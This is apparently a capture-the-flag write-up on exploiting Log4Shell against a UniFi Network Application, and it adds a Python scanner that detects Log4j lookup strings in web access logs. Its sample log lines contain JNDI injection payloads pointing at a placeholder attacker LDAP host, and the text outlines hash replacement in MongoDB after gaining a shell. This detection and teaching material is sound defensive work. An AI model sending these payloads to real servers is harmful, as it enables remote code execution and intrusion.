Unified provides hands-on experience with Log4Shell (CVE-2021-44228), arguably the most impactful vulnerability of the 2020s. This zero-click RCE affected Log4j, the logging library used in an enormous number of Java applications. The target is a UniFi Network Application, an IT infrastructure management platform. The exploit chain starts with JNDI injection served by a rogue LDAP server and finishes with credential extraction from MongoDB to read the root flag.
Log4Shell demonstrated that a single library vulnerability can compromise the global internet's infrastructure. Any string that reaches a Log4j logger is a potential attack vector — headers, cookies, usernames, form fields.
| Concept | Real-world relevance |
|---|---|
| JNDI lookup in logging | Any field that gets logged must be treated as an injection point in Log4j-based apps |
| Outbound LDAP from servers | Firewall egress rules blocking LDAP (port 389/636) from servers to the internet mitigate Log4Shell |
| MongoDB on internal port | Local MongoDB (port 27017/27117) without auth is always worth probing after shell access |
| Hash replacement vs cracking | When you have DB write access, replacing the hash is faster and avoids the crack entirely |
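The first table row has a direct detection consequence: because every logged field is a potential injection point, access logs are where the attempt shows up. The scanner below is an added example, not code from the original writeup, and it makes two assumptions: the web tier writes Apache/nginx combined-format lines with a User-Agent field, and the sample lines (constructed here, with an obviously fake `ATTACKER_HOST_PLACEHOLDER` host) stand in for real traffic. It URL-decodes the client-controlled fields (request line, Referer, User-Agent) and flags any Log4j lookup syntax, raising the severity when a JNDI lookup is present.

```python
"""Heuristic Log4Shell indicator scanner for HTTP access logs.

Added example for this writeup; the log lines are constructed and the scanner
is a string/regex heuristic, not a full Log4j lookup evaluator.
"""
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote

# Log4j 2 lookups have the form ${prefix:value}. Log4j resolves nested lookups
# before the JNDI handler ever sees the string, so matching only the literal
# "${jndi:" is not enough: any lookup syntax in a client-supplied field is
# treated as suspicious, and a visible "jndi:" raises the severity to high.
LOOKUP_RE = re.compile(r"\$\{")
JNDI_RE = re.compile(r"jndi\s*:", re.IGNORECASE)

# Combined log format: ip ident user [ts] "request" status bytes "referer" "ua"
ACCESS_LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


@dataclass
class Finding:
    ip: str
    field: str      # which client-controlled field carried the lookup
    severity: str   # "high" when a JNDI lookup is present, else "medium"
    value: str      # the decoded field content, for the analyst


def normalize(value: str) -> str:
    """URL-decode a bounded number of times so %24%7B... becomes ${..."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line: str) -> List[Finding]:
    """Return findings for one access-log line (empty if unparseable/clean)."""
    m = ACCESS_LINE_RE.match(line)
    if not m:
        return []
    findings = []
    for field in ("request", "referer", "ua"):
        text = normalize(m.group(field))
        if LOOKUP_RE.search(text):
            severity = "high" if JNDI_RE.search(text) else "medium"
            findings.append(Finding(m.group("ip"), field, severity, text))
    return findings


def scan(lines) -> List[Finding]:
    """Scan an iterable of log lines and collect all findings in order."""
    out: List[Finding] = []
    for line in lines:
        out.extend(scan_line(line))
    return out


# Constructed sample lines (not taken from the original page or any real host).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET /manage/account/login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Dec/2021:14:02:15 +0000] "GET /manage/account/login HTTP/1.1" 200 512 "-" "${jndi:ldap://ATTACKER_HOST_PLACEHOLDER:1389/o}"',
    '198.51.100.9 - - [10/Dec/2021:14:02:19 +0000] "GET /api/login?u=%24%7Bjndi%3Aldap%3A%2F%2FATTACKER_HOST_PLACEHOLDER%3A1389%2Fo%7D HTTP/1.1" 400 0 "-" "curl/7.68.0"',
    '203.0.113.4 - - [10/Dec/2021:14:03:01 +0000] "GET /status HTTP/1.1" 200 40 "-" "${env:HOSTNAME}-probe"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f.severity.upper()}] {f.ip} {f.field}: {f.value}")
```

The third sample line is the reason for the decoding step: the lookup arrives percent-encoded in the query string and only becomes `${jndi:...}` after the application (or this scanner) decodes it. The fourth line shows why plain lookup syntax is still worth a medium-severity alert: `${env:...}` is not Log4Shell by itself, but legitimate browsers and API clients do not send Log4j lookup syntax in headers, so its presence in a client field is an anomaly regardless of the prefix. Pair this with the table's egress rule: a server that emits an unexpected outbound LDAP connection right after such a request is the strongest corroborating signal.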
⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing on any systems.
